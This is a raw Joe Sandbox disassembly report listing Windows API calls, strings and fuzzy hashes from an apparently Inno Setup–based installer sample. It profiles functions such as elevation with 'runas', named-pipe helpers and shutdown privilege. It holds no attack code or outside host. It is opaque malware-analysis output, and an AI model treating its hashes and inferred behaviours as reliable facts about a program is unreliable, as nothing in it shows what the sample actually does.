                                                                                                    • GetSystemTimeAsFileTime.KERNEL32(02113858,02113858), ref: 00458642
                                                                                                    • GetCurrentProcessId.KERNEL32(?,02113858,00000000,004588C2,?,?,02113858,00000000,?,00458FBE,?,02113858,00000000), ref: 0045864B
                                                                                                    • CreateNamedPipeA.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 004586C1
                                                                                                    • GetLastError.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000,?,02113858,02113858), ref: 004586CF
                                                                                                    • CreateFileA.KERNEL32(00000000,C0000000,00000000,00499B24,00000003,00000000,00000000,00000000,0045887E), ref: 00458717
                                                                                                    • SetNamedPipeHandleState.KERNEL32(000000FF,00000002,00000000,00000000,00000000,0045886D,?,00000000,C0000000,00000000,00499B24,00000003,00000000,00000000,00000000,0045887E), ref: 00458750
                                                                                                      • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                                                    • CreateProcessA.KERNEL32(00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 004587F9
                                                                                                    • CloseHandle.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000), ref: 0045882F
                                                                                                    • CloseHandle.KERNEL32(000000FF,00458874,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 00458867
                                                                                                      • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5,00000000), ref: 0045349F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateHandle$CloseErrorFileLastNamedPipeProcessSystemTime$CountCounterCurrentDirectoryPerformanceQueryStateTick
                                                                                                    • String ID: 64-bit helper EXE wasn't extracted$Cannot utilize 64-bit features on this version of Windows$CreateFile$CreateNamedPipe$CreateProcess$D$Helper process PID: %u$SetNamedPipeHandleState$Starting 64-bit helper process.$\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x$helper %d 0x%x$i
                                                                                                    • API String ID: 770386003-3271284199
                                                                                                    • Opcode ID: a79b95222fdd7f93703faf8b41e336e667bfcfce42d59c7d41cb43afe138310a
                                                                                                    • Instruction ID: 54c9584e853abf465b9d0f30fdd509929e5717807e8393d963d4681616065440
                                                                                                    • Opcode Fuzzy Hash: a79b95222fdd7f93703faf8b41e336e667bfcfce42d59c7d41cb43afe138310a
                                                                                                    • Instruction Fuzzy Hash: 19710470A003449EDB11EB65CC45B9E77F4EB05705F1085BAF904FB282DB7899488F69
                                                                                                    APIs
                                                                                                      • Part of subcall function 00478370: GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,02112BD8,?,?,?,02112BD8,00478534,00000000,00478652,?,?,-00000010,?), ref: 00478389
                                                                                                      • Part of subcall function 00478370: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0047838F
                                                                                                      • Part of subcall function 00478370: GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02112BD8,?,?,?,02112BD8,00478534,00000000,00478652,?,?,-00000010,?), ref: 004783A2
                                                                                                      • Part of subcall function 00478370: CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02112BD8,?,?,?,02112BD8), ref: 004783CC
                                                                                                      • Part of subcall function 00478370: CloseHandle.KERNEL32(00000000,?,?,?,02112BD8,00478534,00000000,00478652,?,?,-00000010,?), ref: 004783EA
                                                                                                      • Part of subcall function 00478448: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,004784DA,?,?,?,02112BD8,?,0047853C,00000000,00478652,?,?,-00000010,?), ref: 00478478
                                                                                                    • ShellExecuteEx.SHELL32(0000003C), ref: 0047858C
                                                                                                    • GetLastError.KERNEL32(00000000,00478652,?,?,-00000010,?), ref: 00478595
                                                                                                    • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 004785E2
                                                                                                    • GetExitCodeProcess.KERNEL32(00000000,00000000), ref: 00478606
                                                                                                    • CloseHandle.KERNEL32(00000000,00478637,00000000,00000000,000000FF,000000FF,00000000,00478630,?,00000000,00478652,?,?,-00000010,?), ref: 0047862A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Handle$CloseFile$AddressAttributesCodeCreateCurrentDirectoryErrorExecuteExitLastModuleMultipleObjectsProcProcessShellWait
                                                                                                    • String ID: <$GetExitCodeProcess$MsgWaitForMultipleObjects$ShellExecuteEx$ShellExecuteEx returned hProcess=0$runas
                                                                                                    • API String ID: 883996979-221126205
                                                                                                    • Opcode ID: d94476177e89f61339d65e5f577ff2872d1a8d23f03fec93f8535f7d0bd6bb56
                                                                                                    • Instruction ID: b05a94d88e1d9ee0fbafe330a65326fe691daae9ca7e583bddfe233bc85c86e1
                                                                                                    • Opcode Fuzzy Hash: d94476177e89f61339d65e5f577ff2872d1a8d23f03fec93f8535f7d0bd6bb56
                                                                                                    • Instruction Fuzzy Hash: 0E314470A40208BEDB11EFE6C859ADEB7B8EB45718F50843FF508E7281DA7C99058B5D
                                                                                                    APIs
                                                                                                    • SendMessageA.USER32(00000000,00000223,00000000,00000000), ref: 004229F4
                                                                                                    • ShowWindow.USER32(00000000,00000003,00000000,00000223,00000000,00000000,00000000,00422BBE), ref: 00422A04
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSendShowWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 1631623395-0
                                                                                                    • Opcode ID: 7d35c436bdc301b114185cd71e9b34d3d25d314c488a7ae3a8b4f853deae8013
                                                                                                    • Instruction ID: 9e9026b6a08d43f4c34b0c014f83afec13b9727198b5f0eb67f7172f0d04fbcb
                                                                                                    • Opcode Fuzzy Hash: 7d35c436bdc301b114185cd71e9b34d3d25d314c488a7ae3a8b4f853deae8013
                                                                                                    • Instruction Fuzzy Hash: 90915171B04214BFDB11EFA9DA86F9D77F4AB04304F5500BAF504AB392CB78AE419B58
                                                                                                    APIs
                                                                                                    • IsIconic.USER32(?), ref: 00418393
                                                                                                    • GetWindowPlacement.USER32(?,0000002C), ref: 004183B0
                                                                                                    • GetWindowRect.USER32(?), ref: 004183CC
                                                                                                    • GetWindowLongA.USER32(?,000000F0), ref: 004183DA
                                                                                                    • GetWindowLongA.USER32(?,000000F8), ref: 004183EF
                                                                                                    • ScreenToClient.USER32(00000000), ref: 004183F8
                                                                                                    • ScreenToClient.USER32(00000000,?), ref: 00418403
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$ClientLongScreen$IconicPlacementRect
                                                                                                    • String ID: ,
                                                                                                    • API String ID: 2266315723-3772416878
                                                                                                    • Opcode ID: 093fbc58c9f2bb22a74bd7cb36b3f86111f4d6c014dbe9a16a5ffda61369e0f0
                                                                                                    • Instruction ID: 8875a2d430ef8be2c5346fa25315cde737655516302bc4d2344e38a88124d083
                                                                                                    • Opcode Fuzzy Hash: 093fbc58c9f2bb22a74bd7cb36b3f86111f4d6c014dbe9a16a5ffda61369e0f0
                                                                                                    • Instruction Fuzzy Hash: 2B112B71505201ABEB00DF69C885F9B77E8AF48314F04067EFD58DB296D738D900CB65
                                                                                                    APIs
                                                                                                    • GetCurrentProcess.KERNEL32(00000028), ref: 004555F3
                                                                                                    • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 004555F9
                                                                                                    • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00455612
                                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 00455639
                                                                                                    • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 0045563E
                                                                                                    • ExitWindowsEx.USER32(00000002,00000000), ref: 0045564F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                                    • String ID: SeShutdownPrivilege
                                                                                                    • API String ID: 107509674-3733053543
                                                                                                    • Opcode ID: e41b2ce6836bec360355d7b24c2a1717b910cfd1a437749fc580c6f152555136
                                                                                                    • Instruction ID: 23182b732e3c774e917f784577cc733395bd6f0e504c2650860deaf78f25ff04
                                                                                                    • Opcode Fuzzy Hash: e41b2ce6836bec360355d7b24c2a1717b910cfd1a437749fc580c6f152555136
                                                                                                    • Instruction Fuzzy Hash: CBF0C870294B41B9EA10A6718C17F3B21C89B40709F80083ABD05E90D3D7BDD40C4A2E
                                                                                                    APIs
                                                                                                    • GetProcAddress.KERNEL32(10000000,ISCryptGetVersion), ref: 0045D191
                                                                                                    • GetProcAddress.KERNEL32(10000000,ArcFourInit), ref: 0045D1A1
                                                                                                    • GetProcAddress.KERNEL32(10000000,ArcFourCrypt), ref: 0045D1B1
                                                                                                    • ISCryptGetVersion._ISCRYPT(10000000,ArcFourCrypt,10000000,ArcFourInit,10000000,ISCryptGetVersion,?,0047F96F,00000000,0047F998), ref: 0045D1D6
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$CryptVersion
                                                                                                    • String ID: ArcFourCrypt$ArcFourInit$ISCryptGetVersion
                                                                                                    • API String ID: 1951258720-508647305
                                                                                                    • Opcode ID: dc81785b55ac876962535e0a2eb36b1dd730d24c9132c457d47d12d4ae2e21c2
                                                                                                    • Instruction ID: d394b6b565b4a55a8c16e24b867b534ad65140704dc94b035c924c7661ebf9a3
                                                                                                    • Opcode Fuzzy Hash: dc81785b55ac876962535e0a2eb36b1dd730d24c9132c457d47d12d4ae2e21c2
                                                                                                    • Instruction Fuzzy Hash: A2F030B0D41700CAD318EFF6AC957263B96EB9830AF14C03BA414C51A2D7794454DF2C
                                                                                                    APIs
                                                                                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,004981E2,?,?,00000000,0049B628,?,0049836C,00000000,004983C0,?,?,00000000,0049B628), ref: 004980FB
                                                                                                    • SetFileAttributesA.KERNEL32(00000000,00000010), ref: 0049817E
                                                                                                    • FindNextFileA.KERNEL32(000000FF,?,00000000,004981BA,?,00000000,?,00000000,004981E2,?,?,00000000,0049B628,?,0049836C,00000000), ref: 00498196
                                                                                                    • FindClose.KERNEL32(000000FF,004981C1,004981BA,?,00000000,?,00000000,004981E2,?,?,00000000,0049B628,?,0049836C,00000000,004983C0), ref: 004981B4
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileFind$AttributesCloseFirstNext
                                                                                                    • String ID: isRS-$isRS-???.tmp
                                                                                                    • API String ID: 134685335-3422211394
                                                                                                    • Opcode ID: 4cf053d52b7de9e99314ef9443aa0be7ff49bfb1b7c6e14e5d4b85c56af708b1
                                                                                                    • Instruction ID: fc6fb5a4e2302b333323d0d019d05182e8323e6fc1a1653111c694b95695a562
                                                                                                    • Opcode Fuzzy Hash: 4cf053d52b7de9e99314ef9443aa0be7ff49bfb1b7c6e14e5d4b85c56af708b1
                                                                                                    • Instruction Fuzzy Hash: E1316A719016186FCF10EF69CC42ADEBBBCDB45314F5044BBA808E3291DA3C9F458E58
                                                                                                    APIs
                                                                                                    • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00457611
                                                                                                    • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00457638
                                                                                                    • SetForegroundWindow.USER32(?), ref: 00457649
                                                                                                    • NtdllDefWindowProc_A.USER32(00000000,?,?,?,00000000,00457921,?,00000000,0045795D), ref: 0045790C
                                                                                                    Strings
                                                                                                    • Cannot evaluate variable because [Code] isn't running yet, xrefs: 0045778C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessagePostWindow$ForegroundNtdllProc_
                                                                                                    • String ID: Cannot evaluate variable because [Code] isn't running yet
                                                                                                    • API String ID: 2236967946-3182603685
                                                                                                    • Opcode ID: 74e42c9c2b67fd5adc195c0662b506aaf6a0f02139eddaf5114ff9c1448628c8
                                                                                                    • Instruction ID: 8776962154e21e4b1c8854f5ca4bcfaa90dd950cda3ad59ac2e2fede597431d6
                                                                                                    • Opcode Fuzzy Hash: 74e42c9c2b67fd5adc195c0662b506aaf6a0f02139eddaf5114ff9c1448628c8
                                                                                                    • Instruction Fuzzy Hash: 2B91D334608204DFEB15CF55E991F5ABBF5EB89704F2184BAE80497792C638AE04DB68
                                                                                                    APIs
                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,GetDiskFreeSpaceExA,00000000,00455F4B), ref: 00455E3C
                                                                                                    • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00455E42
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressHandleModuleProc
                                                                                                    • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                                    • API String ID: 1646373207-3712701948
                                                                                                    • Opcode ID: 409835b603e199d4170178d82c1615a1651ba94ec2cafac24c158ef3a131e909
                                                                                                    • Instruction ID: d81c9a8c7c52065d28d66f53e81ce4f313aa74f068c2efe820cb9bfc493487ae
                                                                                                    • Opcode Fuzzy Hash: 409835b603e199d4170178d82c1615a1651ba94ec2cafac24c158ef3a131e909
                                                                                                    • Instruction Fuzzy Hash: B0418671A04649AFCF01EFA5C8929EEB7B8EF48305F504567F804F7292D67C5E098B68
                                                                                                    APIs
                                                                                                    • IsIconic.USER32(?), ref: 00417D0F
                                                                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D2D
                                                                                                    • GetWindowPlacement.USER32(?,0000002C), ref: 00417D63
                                                                                                    • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D8A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$Placement$Iconic
                                                                                                    • String ID: ,
                                                                                                    • API String ID: 568898626-3772416878
                                                                                                    • Opcode ID: b31359e3e3f4af84bc1879df8bb30ee95a40fb82c66b770674b351632ff57231
                                                                                                    • Instruction ID: e85585575f8c5a3e7823c55acc6b28d6d187d41511fbfc80546af44b70413e2d
                                                                                                    • Opcode Fuzzy Hash: b31359e3e3f4af84bc1879df8bb30ee95a40fb82c66b770674b351632ff57231
                                                                                                    • Instruction Fuzzy Hash: 4C2112716042089BDF10EF69D8C1AEA77B8AF48314F05456AFD18DF346D678DD84CBA8
                                                                                                    APIs
                                                                                                    • SetErrorMode.KERNEL32(00000001,00000000,0046433F), ref: 004641CD
                                                                                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,0046430A,?,00000001,00000000,0046433F), ref: 00464213
                                                                                                    • FindNextFileA.KERNEL32(000000FF,?,00000000,004642EC,?,00000000,?,00000000,0046430A,?,00000001,00000000,0046433F), ref: 004642C8
                                                                                                    • FindClose.KERNEL32(000000FF,004642F3,004642EC,?,00000000,?,00000000,0046430A,?,00000001,00000000,0046433F), ref: 004642E6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Find$File$CloseErrorFirstModeNext
                                                                                                    • String ID:
                                                                                                    • API String ID: 4011626565-0
                                                                                                    • Opcode ID: 1efd1e5842b6513eb7f92915edfbe8fc84401e145746a4d83abe9154eb57289a
                                                                                                    • Instruction ID: 9d9184480f8630aada0b530c6bd54f2fc26159d28d851f3c8c43bf9f92f270d6
                                                                                                    • Opcode Fuzzy Hash: 1efd1e5842b6513eb7f92915edfbe8fc84401e145746a4d83abe9154eb57289a
                                                                                                    • Instruction Fuzzy Hash: 77418370A00A18DBCF10EFA5DC959DEB7B8EB88305F5044AAF804A7341E7789E448E59
                                                                                                    APIs
                                                                                                    • SetErrorMode.KERNEL32(00000001,00000000,00463E99), ref: 00463D0D
                                                                                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,00463E6C,?,00000001,00000000,00463E99), ref: 00463D9C
                                                                                                    • FindNextFileA.KERNEL32(000000FF,?,00000000,00463E4E,?,00000000,?,00000000,00463E6C,?,00000001,00000000,00463E99), ref: 00463E2E
                                                                                                    • FindClose.KERNEL32(000000FF,00463E55,00463E4E,?,00000000,?,00000000,00463E6C,?,00000001,00000000,00463E99), ref: 00463E48
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Find$File$CloseErrorFirstModeNext
                                                                                                    • String ID:
                                                                                                    • API String ID: 4011626565-0
                                                                                                    • Opcode ID: 7f0cfbd2c28eb096c2c7b79ad6d01cc7699265dce8ba217153498c446e9855ae
                                                                                                    • Instruction ID: 85e7d80bc36d7b3e80fea797042c039a90a2821ca6a16b1e557570abf42aa49f
                                                                                                    • Opcode Fuzzy Hash: 7f0cfbd2c28eb096c2c7b79ad6d01cc7699265dce8ba217153498c446e9855ae
                                                                                                    • Instruction Fuzzy Hash: 3A41B770A00A589FCB11EF65CC45ADEB7B8EB88705F4044BAF404A7381E67D9F48CE59
                                                                                                    APIs
                                                                                                    • CreateFileA.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F3F,00000000,00452F60), ref: 0042E956
                                                                                                    • DeviceIoControl.KERNEL32(00000000,0009C040,?,00000002,00000000,00000000,?,00000000), ref: 0042E981
                                                                                                    • GetLastError.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F3F,00000000,00452F60), ref: 0042E98E
                                                                                                    • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F3F,00000000,00452F60), ref: 0042E996
                                                                                                    • SetLastError.KERNEL32(00000000,00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F3F,00000000,00452F60), ref: 0042E99C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$CloseControlCreateDeviceFileHandle
                                                                                                    • String ID:
                                                                                                    • API String ID: 1177325624-0
                                                                                                    • Opcode ID: 00c40fca2cfdd97ba02e44e9efda7f487b55ec81a2bcf6d63bb4130569f45397
                                                                                                    • Instruction ID: 661b18b1de4eb1238568a50ab540e77c3175952f9b14320adb6d96c9b056064d
                                                                                                    • Opcode Fuzzy Hash: 00c40fca2cfdd97ba02e44e9efda7f487b55ec81a2bcf6d63bb4130569f45397
                                                                                                    • Instruction Fuzzy Hash: 80F090B23A17207AF620B57A5C86F7F418CCB89B68F10423BBA04FF1D1D9A85D0555AD
